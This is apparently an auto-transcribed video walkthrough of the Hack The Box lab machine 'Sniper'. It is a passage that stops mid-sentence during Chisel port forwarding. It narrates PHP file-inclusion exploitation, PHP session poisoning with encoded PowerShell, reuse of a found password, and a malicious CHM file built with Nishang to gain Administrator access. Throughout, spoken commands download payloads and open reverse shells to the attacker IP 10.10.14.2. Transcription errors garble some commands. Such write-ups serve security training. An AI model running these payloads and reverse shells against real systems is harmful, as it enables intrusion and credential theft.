What's going on YouTube? This is Ipsac. I'm doing Sniper, and we're going to do this box two different ways. And each step is going to be very similar, but we're going to put a unique twist on each step to make it feel 100% different. The very first step is getting a shell in the box. The first way is using a remote file inclusion to include code off a SMB server. The other way you can do it is through a trick with LFI, local file inclusion, to include a PHP session file that has been tainted. Then the second step is switching users. The first way we'll do it is just doing PowerShell to invoke command as a different user. And then the second way is we'll upload Chisel to the server and forward the Windows remoting port back to us and use evil WinRM. And then finally, to root the box, there's a scheduled task executing CHM files. The first way we'll use Nishang to create a malicious CHM file to execute code. And then the second way we'll manually craft a CHM file that includes an image off our server and use responder to steal the hash, crack it, and log in that way. So with all that being said, let's just jump in. As always, we can begin with an Nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the Nmap directory and call it Sniper, and then the IP address, which is 10.10.10.151. Can take some time to run, so I've already ran it. Looking at the results, we have a few ports open, but before we go over them, we should start up a Nmap to do all ports, and all ports is -b-, and OA Nmap Sniper -all ports, and the IP address. And then just let that go running while we do some other things, because you should always have some type of recon going in the background. The very first thing we see is HTTP on port 80. Its banner tells us it's IIS HTTPd version 10.0. So we know this is probably Windows 10, 2016, or even 2019. Oddly enough, Microsoft didn't increase the IIS version for 2019. The title of the page is Sniper Co. We have the standard, RPC ports 135 and 139. And we also have port 445 open. So right away, I'm just going to try SMB client 10.10.10.151, and we forgot the -L to list shares, and we get access to 9. So probably nothing right there. So let's go take a look at the website. So going to 10.10.10.151 does reveal a page. If we highlight over a link, we can see it just goes to the anchor, which means it's not going anywhere. So we can check each one of these. And the all services is going to /blog/index.php, and the user one is going to user index.php. So we got two different directories, and we know this server is running PHP despite being IIS, which is a little bit odd. But before we go poking into them, we can do a bunch of go busters. So I'm going to do go buster dir for dir mode, -w for word list, user share word list, dir buster, directory list. We'll do 2, 3 small because I'm going to be starting 3 of these actually. So I don't want to hammer the server too much. I'm going to specify 5 threads. I think the default is 10, but again, because we are doing multiple go busters, I'm lowering the number of threads. -x, this is going to be extension, PHP, and -u, this is going to be HTTP 10.10.10.151/. I'm going to copy this so we can make it easier to run multiple. And the very first one I'm just going to run is this, do -o, go buster -root.out. And then paste, and we're going to do /blog and -o, go buster -blog.out. And you can guess the third one is going to be user and -o go buster -user.out. You could use a different tool that does like recursive directory scanning, but you're going to go into a lot of directories you don't need to, like CSS, JavaScript, etc. So I always like being a bit more targeted. So with those running, let's go take a look at what the pages were. So the blog, looking at this, it's looking like it's all text that doesn't mean anything. We can do Control-U to view the source, and I'm just checking if I see like WordPress, Joomla, or something of that nature. Don't really see anything in the source that indicates that. So let's go take a look at the links up top. Home goes back there. Language, we have it going to blog-en.php, blog-es.php, and blog-french.php, or FR. So it's a parameter. It's got lang equals, and we can change the language to various things. So I generally think when I see like an argument plus an extension, I go right off the bat to some type of LFI. So I'm going to turn this on to Burp Suite, and we're going to go make sure we are intercepting. Shift R to send this. I'm going to do Control R to go to repeater, Control Shift R to switch to that tab. Click send, take a look at the bytes, 6040. And we can see what it looks like. So I'm just going to do language equals please subscribe, and we're going to see what it looks like when something invalid is there. And this shouldn't be like please subscribe anywhere on the server. That thing shouldn't do anything. So we should see how it behaves. The main thing I was looking at is like the HTTP code, and then I glance at the page and I see we get a sorry page not found, and it's also 2910. So I think it's like 6040 and 2910 are the things that we're looking for so far, or we don't want it to be those two things. So we can try including other things. So we could try going to something else on this page. If we go back to the source, we can say, hey, let's try including blog CSS style.css. Click send. We get page not found, but we're already in blog. So I'm going to try taking this off and just try CSS style.css. And it looks like we're getting something because I'm looking at the bytes. It's not like 2000, it's not 6040. And down here, it looks like we get a CSS file. So we have included it. We could also try like a PHP wrapper. I think it's PHP : is it filter convert dot base 64 encode resource is equal to index.php, I think. I'm not even sure if this is going to work on Windows. We can try URL encoding that and then send it. We don't get any base 64, and I'm just going to Google real quick, PHP wrapper filter base 64. And let's see. PHP filter convert base 64 dash encode. Is that what I have? Convert base 64 dash encode. And we still get nothing. So we can't do that. And being able to do this would allow us to extract PHP source code. If we try just having it call itself, if this is executing code, which it looks like it is, we get an indefinite hang because this is really index.php, and we're trying to have index.php load itself, and then when it loads itself, it's going to load itself again, and then again, and then again, and again, and then just never finish. Or maybe it'll finish in a few minutes with some weird error message because it ran out of memory. So we could try calling a different index script. So .. Click send, and we're getting page not found. So we go up one directory to blog, click send, page not found. This is Windows, so I'm going to try backslashes, and we get page not found. So I'm thinking there's a possibility that like there's some bad characters, and anything with 2 periods is a bad character. Because this should have worked if it wasn't, because we just went up one directory, then into the directory that we know because of the URL, and tried including itself again. So let's try random Windows files. Let's do /Windows system32 license.rtf. Click send. 63,000 bytes, and we're getting a Windows license. So we know that this is now definitely an LFI. We could try including other things, like I think there's a directory panther unattend.xml. Will this work? 2910, not there. Is it unattended.xml? 2910. Panther directory. C:\Windows Panther. Is it unattend.xml? Maybe that file doesn't exist. I was trying to find a file that would indicate what version of Windows it is, but I'm not exactly sure. It's unintend.xml, so file doesn't exist, and I'm not sure other files. I'm sure there is one that you could pick and then find out what it is, but we'll just move on. Let's try doing a remote file include. So 10.10.14.2, we'll call this HTTP please subscribe.txt. So we're just trying to call back to our server and load the file please subscribe.txt. So I'm going to do nclvnp 445. Click send. It's taking its sweet time, and we get an SMB header. So that's a good sign. We do have the server now calling back to us. So we could place a file, but generally I always like, again, doing recon in the background. So I consider password cracking recon. I'm going to run responder and see if we can get the server to cough up a NTLM v2 hash. Click send. We don't get anything. I'm going to try TCP dump -i. It's capital I think. ton 0. Maybe lowercase I. And we gotta do port 445. Click send. We see it coming to us. We don't see responder giving us a hash, and we verified SMBServer is on. So this should have worked if the server was vulnerable to that. Doesn't look like it is. We could verify it by doing like SMB client 10.10.14.2, which is myself, specify something, and the password of please whatever, disconnect. I thought that would have worked, but maybe not. Let's just move on because we did not get the hash. So the next thing we want to do is try like an impacket web server or SMB server. So make dir SMB. Let's go in this impacket SMB server -SMB2 support. And then the share name, we'll call it HTTP, and the path of where we're at. Let's go in here and create the file. Did we capitalize it? We did. So please subscribe.txt, and we're just going to call this LFI test. So now when we click send, we see it connecting. We see a bunch of error messages, and we'll see if it actually loads that file. Looks like it stopped. Going down, 2910, page not found. So at this point, we could do a lot of troubleshooting with SMBServer itself, or we can just accept that sometimes like pen test tools are there for convenience and they're not the most well tested or stable things in the world, and move on. And that's what I generally do, is I want to know, is this a problem with impacket, or is this just not SMB itself? Or is this just not working in general? So we're going to go to the actual SMB server within Linux, and this is etsy-samba-smb.conf. And let's just grab something, profiles. So this is going to 193 to 199. I think that's 6. So hit 6, YY to yank, paste, uncomment, and we'll name this HTTP. The comment will be, please support me on Patreon. The path, I always like using a path as close to the root as I please. So that would be SRV SMB. I don't want to go root HTTP boxes sniper SMB because file permissions can get wonky and things may just not work. So that's why I'm doing only 2 directories up. Guessed OK, we want yes. Browsable, we want yes again. Create mask 600, sure. Okay. And then cd srv. Let's go into SMB and create the file please subscribe.txt, and then put LFI test here. And then we can do systemctl start SMBd. There we go. And when we go to run this, we can go down, and we do see LFI test. So looks like everything is good. If you run into troubles with this, some good troubleshooting tips would be use SMB client. So SMB client dash capital L 10.10.14.2, hit enter, and if you see the directory, that's good. Then also you can do, we can delete this real quick and run SMB client 10.10.14.2 /HTTP, and then run dir and try to get the file. So please subscribe.txt, and we see the size of 9. If we exit, we can cat it, and we can download it that way. So that's some good troubleshooting tips that may help you go down the path. It always sucks trying to troubleshoot something that doesn't work by trying to exploit out where you won't have standard out on the remote end. If you test it locally, you have all the logging you can potentially want, and you're good. So hopefully that makes sense. Now we can make the text file, let's see, rce.php. Will be very obvious with this. So create the PHP file, system, echo test. We'll do rce test. I think we do it this way. Again, I'm just doing this as simple as possible each step of the way. And then we'll get a shell through a complex method in just a little bit. But always helps breaking things apart to make sure it works before you do anything. So rce test does work. I screwed something up there. That syntax has just got awful. Sometimes it's hard to talk and type at the same time. So we're going to do request, please subscribe. Okay. So now we should have a way to execute code. So if we do and please subscribe is equal to who am I? Click send. And tier 30 I user. So that is good. We could also run like system info is another good one to always run. And this will tell you information about potential patches. I said patches highlighted processors. Well, in 2019 standard. And it doesn't show hotfixes right here. Maybe we don't have permission to see hotfixes, or maybe none are installed. So just something to keep in mind. So with the shell, what are things we want to do? Well, we always want to get a reverse shell. So I'm going to do, before I do that, I hate working in Git parameters. I always like doing post because it's just a bit more reliable in terms of the encoding. So I'm going to right click, change request method, click send, and see if we still see our user at the bottom. We don't. And that's probably because this index.php is expecting lang to be on a Git. So if we thought about the source code, it's probably Git instead of request here. These parameters are Git, post, or request. However, despite this being a post request, PHP is wonky, and we can, or maybe the HTTP RFC is wonky, but we can put the request up there, and we can put ers down here, and it should work. So even though the code is saying get the variable and we're doing a post request, as long as you put it where a get request should work, it works. So little handy tidbit. Now we can do PowerShell who am I to make sure we can run PowerShell commands. And we can. So let's try a reverse shell. So ix new object net.web client download string http 10.10.14.2. We'll call this please subscribe.ps1. And that should be good. Let's highlight this, Control U to URL encode, and then we got to build that web shell. So let's go HTTP boxes sniper, make dir dub. And then what we can do is cp user share Nishang shells invoke PowerShell TCP.ps1 to what did we call this? Please subscribe.ps1. So just copy this reverse format to the bottom of the script so it executes as soon as we load the script, and put the port information. So 9001, and we are 10.10.14.2. And 10.10.14.2 is my box's IP address. If you do ifconfig ton0, you can see what yours is. Mine, again, 10.10.14.2. So now Python 3 http.server 80. When we run this, oh, we forgot to get a shell. NC LVNP 9001. Click send. Nothing happens, which is odd. We could try like wget, since PowerShell supports wget. So PowerShell plus wget. We don't need that. Click send. And it downloads it. But it's not going IEX. And let's Control Z a bit so I can highlight things. And based on my experience, I know antivirus or AMSI, anti-malware scanning interface, doesn't flag this as malicious. And because it never hits our box when we do this request, I don't think this is going to be some type of antivirus. I think it's most likely what PowerShell mode we're in. So the first command I'm going to run is PowerShell plus, is it execution context.session_state.language mode. I think that's it. Click send. Go this, and we'll see it when constrained language mode, which limits a lot of our PowerShell abilities. So I'm going to avoid running like anything that I deem uses like .NET reflection, which is that IEX thing. Not IEX itself, that, oh my god, brain fart. Come on. New object net.web client. So this doesn't work in constrained mode. You could try like system.net.web client, doesn't work. We could try to do something like wget to download this reverse shell to the disk, or use PowerShell encoding to try to get around it, but the script itself uses things that don't work in constrained mode, to my knowledge. Yeah, I don't think this works in constrained mode, the systemnet sockets. So let's just try with netcat. So I'm going to locate nc.exe, and we're going to copy it from user share window resources binary nc.exe and copy it here. And the locate command isn't always up to date. As you see, it said the file existed here when it didn't. You just have to run update.db or update.db before you run locate to update that database. But now that we have netcat in this SOV SMB, let's try changing this to be 10.10.14.2 htb nc.exe, and then we want to connect to 10.10.14.2 9001 and run the command PowerShell. We could do cmd, but despite being in constrained mode, I still like being in PowerShell itself. So try running this, and we'll see a shell comes back. So now we are NTR 30i user on this box. So we can go to cd/ GCI for get child item. You could also do dir. There is a docs directory. We can go into docs. Don't have permission. So we can go into users, see who is on the box. Administrator, Chris, and public. We don't have permission to go into any of these, except public we do probably. But we could do GCI-recurse. We don't. Permission denied on all three. So we can't even get into public to do anything. So let's go back to where our web shell was, which is inetpub www root. So cd inetpub www root. See what's here. We have index.php. We can do GCI-recurse select. I think it's full name I want. There we go. To list all the files. And we can kind of go down the list of things that may seem interesting. So the blog, we don't really have too many PHP scripts. I'm mainly interested in files and ending in PHP. So I did that to highlight them. Go down. We got auth, db, index, login, logout, and registration with the weird backup. So this user directory is super interesting. So let's go into user, GCI, and then we can do gc auth.php. GC is get content. And this is just saying if a session is set, go to login. Or if a session is not set, go to login.php. So that's included at the top of probably index.php. So how that works is, yeah, so where is our command? So we just did index.php, and it didn't include the file. It actually put the contents of it. But as soon as this file loads index.php, it checks if you're logged in. If you're not logged in, it directs you to login.php, and the rest of this code doesn't even get read or executed. So we want to look at db.php next. And let's see. Enter your host username. I left password empty because I do not set password on localhost, but there is a password. So that is unique. We can copy this. And the user is sniper. If we do net user, we don't have a sniper user on this box. And as being local on the box, one thing a lot of tools don't run is a bunch of like just information. So if we do net user Chris, we get a lot of good information from him. So password last set, always good. If I'm on an engagement and I see a password set like 5 years ago, that's going to be the passwords I try, like password 2015, which may be like a default password from 5 years ago. I'm probably not going to try password 2020 on a password set 5 years ago because that just doesn't make sense. And generally passwords that are super old may be more likely to be weak. So having password last set is super handy, especially when you look at this and see db.php was edited the same day that Chris changed his password. So if we look at db.php, that's April 11th, 10:51. And approximately like 5 hours before that, Chris set his password. So it's definitely interesting. And Chris is also a member of Remote Management Users, which is PowerShell Remoting. So what we could try is do dir, or not dir, type db.php, grab Chris's password, or not grab Sniper's password, and then go into crackmap exec -u, Chris -p, put the password in. We need to do SMB 10.10.10.151 and see if this works. I think it's IP then SMB. Crackmap exec is super picky at where you place each argument. So always keep that in mind. And because we have a directory called SMB, crackmap exec's not running. So I guess for every argument you do, it checks if there's a directory or a file, and if there is, it tries to read it. So make sure you don't have the directory SMB when you run crackmap exec. But we see Sniper Chris is passing that password. So that is the password. So let's go and try to invoke a command as Sniper. So we can do pass is equal to convert to secure string, and then paste the password. Crap. I'm going to add our LWrap real quick. Do that command. If you don't have our LWrap, it's in the apt repository, but it'll let you do left, right, up, and down on a Windows reverse shell. So let's send this again. Okay. Copy. And you could have also done net user administrator and see when their password was set. And we could have tried that as well, but I digress. So we wanted to execute command as Chris. So let's do pass is equal to that. And then actually pass is equal to convert to secure string this as plain text dash force. I'm going to type it again just because we're in constrained mode. I'm not 100% positive this works. Looks like it does. The next thing we want to do is cred is equal to new object system management automation ps credential Chris pass. Okay, we got cred. It is an object, so this command did work. So now we can do invoke command computer name sniper credential cred script block. Who am I? And we get an error message. So let's see. A specified logon session does not exist. Possible cause, username invalid, Kerberos is used, whatever. Check the authentication method. So let's try changing this like this. And when we ran crackmap exec, let's see, is it in this session? Was it 3? Oh, I don't. When we ran crackmap exec, it said, there we go, hit it. The username was sniper / Chris. So that's why I'm trying this. I always do 2 backslashes out of habit because backslash is a weird escape character. You never know how things work. But now when we try this, now it works. So that's how you need to do the username. So now we can call this shell-iis, go to 4, and see LVNP 9001. We'll call this shell-chris. And the script block will be 10.10.14.2 htb nc.exe 10.10.14.2 9001 and PowerShell. Go to shell-chris. Who am I? And we're now sniper-chris. The box is listening on, or I thought it was listening on WinRM. Doesn't look like it is. You could also upload a tool like Chisel on this box and then do PowerShell Remoting over localhost on your box. Essentially create a tunnel and expose the Windows Remoting port, which is, what port is it? TCP 5985. So if you ran Chisel, if you don't know what Chisel is, look at my Reddish video. But if you ran Chisel and forwarded port 5985 on this box back to your box, you can connect to it through like evil WinRM or something. But this is fine. And did I not do URL wrap here? I did not. Let's do that. So now we are Chris. So if we do GCI, nothing in documents, we can do GCI here and GCI dash recurse. I think there is, let's see, GCI only files. Let's see. Get type, let's see. Dash include star.star. Let's try this. Include. I think there's a dash type just like in Linux, but we can look at all the files inside of this directory. There's user.txt, which is going to be the hash for the user. There's also a instructions.chm. So we can try copying this back to our server. So let's go into downloads and then copy instructions.chm to 10.10.14.2 HTTP. I think that's all we need. Access is denied. So let's go. Oh, we're not running Impacket SMB server. We're running Samba. I was trying to go to a pane that had like Impacket running so I could change it to allow write access. So let's do the flag writable is equal to yes. And then systemctl restart SMBd. Go to Chris, copy it. Access is denied. cd sov chmod 777 SMB. I like to live dangerously. And again, this is why I normally would use Impackets SMB server, so these changes that I'm making on my box do not persist. So I'm going to change this back to 755 because that is a super dangerous thing to do. But we have now got instructions.chm. If we do file against it, it's a MS Windows HTML help data. And from this part, we probably should be on Windows because I don't know of a good way to edit these files on Linux or open them. We could also go back. There was a docs directory, and there is note.txt, so we can do gc note.txt, and it's telling us our PHP skills suck. We should write some documentation. I'm also going to copy this PHP for Dummies trial to see what this is. To 10.10.14.2 HTTP chmod. Let's go down. Copy. Change it back. And for that one, we can actually open it before we switch to Windows. So root, HTTP, boxes. Oh no, we're in SOV SMB. Let's see, PHP for Dummies. Is this actually what it says it is? Do. Come on. Loading. And it looks like it actually is. So we can delete that because that's not too important. And I guess the next step is going over to Windows and taking a look at this CHM file. And also on Windows, we'll want to use Nishang because Nishang does have, if we go user include Nishang, locate Nishang. I just went there. User share Nishang. Find .grep-i chm does have a out.chm function, which will give us code execution. But this is a PowerShell thing, and it also wants a executable called HTML help workshop installed. So We're going to also do this on Windows. So let's get our IP address of our box and then switch over to Windows. Let's go up here. I have Commando running here. And then we just go to the share and we can copy the CHM file to our desktop. We could open it if we want to. And we just see some text, but we want to make this malicious. So let's see, do we have Nishang installed in Commando? The heck? C::tools Nishang. Okay. So we do. So dir. Let's do, where is the out-chm? That was in client. And I can probably make this text bigger. Properties. The heck? Okay. So we can run out-chm -h. Let's just notepad it. And of course, the text isn't that big. But there we go. So let's see. Does it give example? Out-chm payload script, payload encoded command, payload URL. Is there a payload command option? Dash payload. So that's probably what we want. So out-chm dash payload 10.10.14.2 and HTB nc.exe 10.10.14.2 9001-E PowerShell. So that should be good. We need -hhc path, and this is that HTML workshop. So C::program files x86, and we don't have it. So let's go and Google for this. So go to Chrome, search HTML help workshop, download and install this. I think one of my biggest pet peeves is when a website's like JavaScript changes where the page is. Like when I loaded this, went to click download and this banner showed up and changed where everything was. I cannot stand that. But install it. Already has it. Okay, well, this directory exists now. So paste that. Okay, that's it. out-chm. Did that create a... Is that a command now? Client. Why is it not? That's weird. What's the function called? out-chm. cd/tools, Nishang client. Client import module. Do we do that? There we go. Okay, that's what it wanted. It's been a while and my brain is currently fried from talking for probably an hour. out-chm, let's go to desktop actually. out-chm, paste that. doc.chm it created. So minimize, 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 minimize. doc.chm. Oh, we just try to execute code. I'm gonna laugh, that actually just worked. And we go back. Oh no, it won't, because this box doesn't know how to get to 10, 10, 14 too. //172, HTB. You have to go back to a box. chmod 777, SOV SMB. Copy. Go back. Let's take that out of the dangerous mode. And we can go back to our shell-chris. And we do dir here. If we echo verlarg to note2.txt, and we do note2.chm and do a dir, let's see, do these disappear eventually? And disappear eventually, generally when you do CTFs and something's supposed to happen to a file, it does disappear. And what we can also do, nclvnp 9001, and copy our file. HTB, the file is called doc.chm. Denied. SOV SMB. chmod 777. Copy it. So the note.chm file got deleted, but note2.txt did not. So that is a good sign for this document directory of being the place where users delete things, I guess you can say. dir, that got deleted, but we did not get a shell. So let's look at the script we're doing. 10.10.14.2 HTB nc.exe 9001 PowerShell. So you would think this would work. dir, the file's gone. So what I'm going to do, dcp dump -i ton 0 port 445, copy. Did it just get deleted? It's still here. So we're going to see if this file goes away. And when it goes away, do we get any hits? So at this point, we've probably made a pretty complex file. So what I'm going to do is make it less complex. So SOV SMB. Let's go back up. Our payload is simply going to be a ping. So we're going to ping 10.10.14.2. And we'll probably want to rename this to something else because I don't think we can overwrite it. Call this ping.chm. Switch back. chmod 777. Ping. Go back to the shell and copy ping.chm. So if that payload option actually executes ping, we should see it in this TCP dump. So it exists. And then it's going to potentially get deleted, and hopefully we see it. Yep, there we go. It's now pinging us. And then I think Windows defaults to 4 pings. And then it probably dies. So the box did ping us. I guess the next step we could do is copy netcat to this box, or maybe do like cmd/c. So the very first thing I want to do is the cmd/c thing. So we can try cmd/c. 10.10.14.2 HTB netcat.exe 10.10.14.2. Yeah. So we'll call this one cmd.chm, copy, we have to chmod 777, cmd. We could change the, hold on, 445, the option, what is it? Etsy, Samba, SMB, the create mask to be 666 or something. Let's do that real quick. So now all files created are chmod 777. And we can just exit that terminal. Does not look like it worked. So let's simplify it and copy netcat to this box. So let's go users, Chris, downloads, and then copy 10.10.14.2, HTTP. Do I have HTTP? I do. Okay. HTTP nc.exe to here. Okay, that file exists. So c:users Chris downloads. So payload c:\users Chris downloads nc.exe 10.10.14.2 e PowerShell. Okay. Create a doc, and we'll rename this one to NC. Copy. Docs. nc.chm. Does not look like that create mask took effect. Okay, so hopefully this one works. What am I running? NC 10.10.14.2 9001 e PowerShell. Oh, there we go. I was just about to do it manually. And now we are Sniper Administrator. We go Users, Administrator, whoops. Administrator, Desktop. We could get root.txt. So that is the box, the first way we're going to show it. We're going to do this box again and try not to use our SMB server as much. So let's exit out of everything and we'll do the box again, a different way. And I haven't actually done this way yet, so it could be a learning experience. Well, I did it like 5 or 6 months ago, but I didn't prepare to do it this way, is what I meant to say. So go all the way back. So we did an LFI through, or an RFI through this page. We're still going to abuse this page, but we're going to do an LFI instead. And the server also supports logins. So you could try like admin and try to log in. You get username, password incorrect. You could throw it to SQL map, not really get anything. But if you do sign up, we can do love the alternate.ways. IPsec, and the password will do password. Register. If we do log in with IPsec and password, we get this portal is under construction. Well, in PHP for Windows, if we Google PHP Windows IS session path, it is C:\Windows temp, I believe, right here. So 10.10.10.151, go to our services, do this LFI, and we can do /windows/temp/ and then our session. So if we look at our cookies, go into where's storage, cookies, here's our session. So SESS_that. We see what our PHP session is. Username ipsec. So in this session, we can actually encode stuff if we change what our username is. So let's go log out, sign up, and we can try email. Let's just do a@b.com. Username, PHP, system, get, ipsec, like that. Super weird username. See if this works. Register. Probably should look through burp to see what that just said. Username and password is incorrect, but let's look at what our session says. Here's what our session is. Paste. Nothing. So let's see. How do we exploit this? I guess we have to find out what the bad characters of our user login is. So let's go back to login and analyze a login request. So we'll do a2@b.com, username LOL, password LOL, send it to burp suite, make sure intercept is on, register, send it to repeater, click go. 302 found. Let's do a bunch of bad characters. So this should not work. 302 found. Let's try putting it at a different email. Still get it. So we probably should, I guess we can try logging in with this. Control-Shift-U. Copy up to the D. Turn burp suite off. We're probably going to have to create a script to create accounts and attempt to log in. Password was LOL. Password incorrect. So let's switch over to Python and create something. So the very first thing we have to do is figure a way to generate something random. So I'm going to import, do I have secrets? I do. Token hex, we'll do 10. Secrets.tokenhex, okay. I just want to make sure I have that library. If you don't, you can do pip3 install secrets, but find badchar.py, and we're going to import requests because this is going to be what we use to log in. So URL login is equal to HTTP 10.10.10.151 user login.php, and then registration, URL reg is equal to the same thing, except this is registration.php. Okay. And then the characters we want to test is equal to I don't know if I hit them all, so let's do this again. My microphone is in the way of typing this. That's where the issue comes from. Quotes. Ooh, that's a tough one. Let's do Python 3, import string, string dot punctuate. Is it symbols? Symbols. Punctuation. That does it. So import string and characters is equal to string dot punctuation. And then for character and characters, we need to print char. Let's make sure this works. Python 3, find bad char. That looks good. And we'll do random is equal to the secrets dot token hex 10. We can import secrets. Okay. This isn't the best way to do random, I guess, because we're only doing hex, but I mean, we're not really using random in a way that needs to be secure. So data is equal to, burp says email, username, and password. So, and submit. So email is equal to, and we're going to do random at pleasesub.com. That looks fine. Username is equal to the character. And then password, we would do A. And then submit. Like that. If we print data, that looks good. So now the next thing we do is register account. So R is equal to request.post, URL is equal to URL login, data is equal to data, and we can do that'll be fine. I was thinking about sending it to Burp Suite, but if we have issues, we'll do it. R is equal to request.post. Actually, the first step is register. And then we got to log in. So let's intercept the login request. So that's register, login is username, password, and submit. So URL is equal to URL login. And the data this time is going to be username, password, submit. So we can get rid of email, username, password, submit. There we go. And data is equal to data. At this point, we could also probably use wfuzz once we create all the accounts, because we don't need to know that random email, but print error.text. Actually, login. You can just send this login request. Let's go to repeater. HTTP history, login, send. So we can say if incorrect. So if incorrect is in r.text 2, 3, 4, print the character. So what this is going to do, loop through all the characters, create the account, then attempt to log in, and if it fails to log in, it will print the character. It's requests, not request. And we may want to send this to Burp Suite. Oh, no. There we go. We found 1, 2, 3. So for right now, we may have used the quote in our username, and that's a bad character. Dash is a bad character. Don't know if we use dash. Semicolon. Space is probably one. I don't know if we did space in this. I don't see a space here. So that's one thing we're not counting for. So let's do that real quick. So go back to Burp Suite, turn intercept off, go back to Firefox, user, we gotta log out, register, something that doesn't exist, username space, we'll do A space B, password of A, B, password of A. We can log in. If we look at our session, let's see. Let's go here. Not sure why we're not getting the cookie of our username. But it looked like it worked. Either way, I think we can probably work around this. So, single quote to use. We have a single quote here. We can probably do like a PHP execution with this, I think. Let's try registering with this, because these carets aren't, question mark isn't, and equal isn't. Equal should let us do this without a space, I believe. Let's see. This is the page I wanted. Log out. Sign up. At b.com. A. Oh, we need backticks. There we go. Log in. Paste A. That logs in. Let us try including this session. Nothing. Let's delete a cookie and get a new cookie. So, what was the username? This. There we go. Log in. Paste. Username, and we have code execution right there. So we found a way to do it without utilizing our SMB server. Now we got to find a way to get PowerShell running or command running. Let's try PowerShell. So PowerShell supports two ways. We can't do -enc for encryption because dash is a bad character, but PowerShell does support slashes. So we could do /enc. So if we do echo, who am I convert T UTF-16 little endian, because that's how PowerShell likes it. Base64 W0, copy it like this. We can test it out in our Windows machine. So let's go into a command prompt, PowerShell /enc, paste, and it works like that. So let's try it in registering a user. So go back here. Let's just close this tab. Let's delete our PHP session, sign up, email. This is getting annoying with email. So we can do is equal to backtick PowerShell /enc backtick like that. Let's copy this, register, and then log in. Grab our session cookie and paste our session cookie. And we still get NT authority user. So now we have a way to run PowerShell through this. So let's go and I think we have payload all the things on my box. Opt, payload all the things, find.grep reg, grep-ri reg sv. This is what I want. So we want methodology and resources, download and execute. That's DLLs though. Let's see. Reg svr 32 reverse shell. Let's see. Cert util mshta. Let's see. Let's just do an SMB server. I was thinking about this. There's a lot of things that will probably go wrong, such as being in that PowerShell constraint mode. So if you want, you can challenge yourself and try to do a lol bin to execute this, but we're just going to do it the old-fashioned way of executing netcat on our web server. Actually, let's do two. Let's try uploading netcat to the box and then executing it. So make dir dub. Let's copy srv smb netcat exe here. So we got netcat. So we can do echo wget 10.10.14.2 nc.exe dash capital O, I think is for out file. We'll call this please sub.exe. Okay, that should be fun. Oh, we probably want to write it in the temp directory. C:\windows temp. That is a big command. Hopefully the username doesn't have like a length limit. Copy. That looks fine. Echo-n. Because this is a big thing, I just want to unbase64 it. If we pipe it to XXD, you can see it's in UTF-16 little endian because there's a null byte after everything. So that looks good. Copy. Okay. So now we create the user and hope there's no length limit that's preventing this. Question mark is equal to PowerShell, encrypt this, backtick, like that. Probably should you had the Python script do this. Let's delete the PHP session, log in. Ooh, we logged in. We have to start an web server. We want Python 3, HTTP server 80, and paste the new session. We have downloaded netcat. So now, nclvnp 9001, we can try executing it. So let's do echo. Should have just paid attention when I saved that as please sub.exe. Echo C:\windows temp please sub.exe 10.10.14.2 9001 e PowerShell. Okay, I convert T UTF-16 little endian base64 W0. This is even longer, I think. Copy. Let's go log out. Sign up. paste junk, username. We got to do the PHP tag. So that equals this. There we go. Copy. A is the password. Then delete. We are listening. SQL and Windows temp. That looks good. Log in. Oh. We have to take a value and paste it. Doesn't look like we got a shell. We can try doing view source, please sub.exe to see if it downloaded. We get page not found. So chances are this executable did not download. So let's see. The way I normally work around this, it's number one, it could be a permission issue. Maybe we can't write into SQL and Windows temp. However, I think we can because that's where the session file is stored. So my guess will be that -o option is wrong on wget. So let us change this IP to 172.16.10, I think 184. Yep. So we can copy this, start our server back up, go back to our Windows box, PowerShell, encoded, paste, cd Windows temp, not found. So if we go PowerShell, wget 172.16.10 184 nc.exe-o t.exe. We'll do t.txt. Oh, it's access denied. wget-h. Let's see. Let's just do t.exe. So it does exist. So that -O looks like it does work. So maybe we just can't write there. Let's go back and look at everything we did. So C:\Windows temp, please sub.exe. So let's see. C:\Windows temp. That should work. Should be there, but it's not there. So I guess let's just try everything again to make sure we didn't make an error or something. So the very first thing we do is a wget. So let's copy this and do 10.10.14.2 nc.exe, and we'll just call this pleasework.exe. And I'm not going to specify C:, I'm just going to do /Windows, because maybe it doesn't like the colon. I'm also going to put this in quotes, even though this shouldn't matter, because we saw the box hit our server already. So let's just copy, and now we have to create that PowerShell user on the registration. So log out, delete our cookie, create a new account, and do something, !@ equals paste, like that. Copy this new string. Let's see, we don't have a www server running yet, so let's do http.server. There we go. Let's log in and take our cookie, paste our cookie, And this should have downloaded, but it didn't. So we screwed up something. Let's see. wget 10.10.14.2 nc.exe. That is us. Dash capital O. Wonder if we just... Let's try this again. I should really start converting that Python script to do this for me, because it's very possible my user error that I'm introducing by doing it manually is screwing things up. So question mark and like that equals, yep. Oh, I probably didn't do PowerShell /enc. Let's try this. A copy login copy. There we go. We got a hit. So we can now try please work.exe. Do you 404 on me? You do not 404 on me. That is great news. So close out of that. Start our reverse shell back up. And where is this? So this will be please work.exe. And I think we just did magic. So copy this, log out, delete, sign up. Equals like this, PowerShell /enc, like that. Copy, register, paste, copy our session, paste, and we get a shell. So we got a shell without using SMB whatsoever on this box. So I guess the next thing to do, let's use evil WinRM, because why not? Do I have Chisel on this box? Let's just go download Chisel. So get off of burp. And then Chisel GitHub. Okay. Let's see. Where's release? There it is. I want it for Linux. And I want it for Windows. Probably 64-bit. Okay, CP downloads. What were the names? Chisel. Make dir chisel mv-stir.zip chisel. What? Stir.gz. Different. I'm used to when I download things, they're in zip format. Is that not turd? gzip-d. There we go. chmod +x chisel Linux AMD 64. And let's see. Does this have instruction page real quick? Chisel server port like that. And chisel client. So then we can do chisel server listen on port, let's say 8000. And because we are the server and we want to open a port up, we need to enable reverse. If we wanted a port on the client to be enabled, we don't need to open up reverse. But since we're the server and the server is going to listen on a new port after listening on 8000, this is why. If you're confused, watch the Reddish video. So now we're there. Let's copy chisel chisel Windows AMD 64, to chisel exe, stood up a web server, and we can go into Windows temp, wget http 10.10.14.2 chisel.exe dash capital O chisel.exe and begin downloading the file. How big is this file? That's taking a while. cd www du-hs chisel 7.3 megs. I mean, it is using Go and not compressed, so guess that makes sense. So now we do netstat-anlp, netstat-anp, an, there we go. Windows flags trip me up sometimes. Let's see. We want port 5985. We could also do 3306 and then access the MySQL database, but let's just do this first. Actually, sslnpt. I'm going to try doing 2 on one line and see if that works, because I don't know if it does. So chisel.exe client, and then we want to do 10.10.14.2 port 8000 or 5985 127.0.0.1 5985. So reverse, so the port is opening up on the server. We're going to open up port 5985, and anything that we hit on 5985, it's going to send it through Chisel, come out on this end, which is Windows, and get directed to this port. So that's what that means. 127.0.0.1 through 306. Let's try this with 2 flags. If I hit enter, 